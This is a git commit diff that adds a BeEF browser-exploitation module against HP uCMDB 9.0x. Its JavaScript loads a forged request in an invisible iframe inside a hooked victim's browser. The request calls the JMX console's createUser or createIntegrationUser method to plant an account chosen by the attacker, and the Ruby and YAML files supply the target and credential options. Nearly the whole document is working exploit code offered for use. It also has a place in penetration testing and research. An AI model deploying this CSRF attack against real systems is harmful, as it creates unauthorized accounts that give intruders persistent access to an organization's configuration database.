HP uCMDB CSRF add user module

2012-10-05 13:23:24 +02:00
parent a0891dbccb
commit 03da56fc7d
3 changed files with 106 additions and 0 deletions
--- a/modules/exploits/hp_ucmdb_add_user_csrf/command.js
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/command.js
@@ -0,0 +1,41 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {	
+var protocol = '<%= @protocol %>';
+var host = '<%= @host %>';
+var port = '<%= @port %>';
+var usertype = '<%= @usertype %>';
+var customerid = '<%= @customerid %>';
+var username = '<%= @username %>';
+var password = '<%= @password %>';
+
+var url = protocol + '://' + host + ':' + port + '/' + 'HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=' + usertype;
+url += '&arg0=' + customerid + '&arg1=' + username + '&arg2=' + password;
+
+if (usertype == 'createIntegrationUser'){
+	url += '&arg3=';
+}
+
+var ucmdb_iframe = beef.dom.createInvisibleIframe();
+ucmdb_iframe.setAttribute('src', url);
+
+cleanup = function() {
+    document.body.removeChild(ucmdb_iframe);
+}
+setTimeout("cleanup()", 15000);
+
+beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed");
+});
--- a/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+    module:
+        hp_ucmdb_add_user_csrf:
+            enable: true
+            category: "Exploits"
+            name: "HP uCMDB 9.0x add user CSRF"
+            description: "This module attempts to add additional users to the HP uCMDB (universal configuration management database).<br />For more information please refer to <a href='http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html'>http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html</a>"
+            authors: ["Bart Leppens"]
+            target:
+                working: ["ALL"]
--- a/modules/exploits/hp_ucmdb_add_user_csrf/module.rb
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb
@@ -0,0 +1,40 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Hp_ucmdb_add_user_csrf < BeEF::Core::Command
+
+  def self.options
+    return [
+		{ 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore',
+          'store_fields' => ['protocol'], 'store_data' => [['http'],['https']],
+          'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true
+        },
+        {'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
+        {'name' => 'port', 'ui_label' => 'Port', 'value' => '8080'},
+        { 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore',
+          'store_fields' => ['usertype'], 'store_data' => [['createUser'],['createIntegrationUser']],
+          'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true
+        },
+		{'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1'},
+		{'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF'},
+		{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end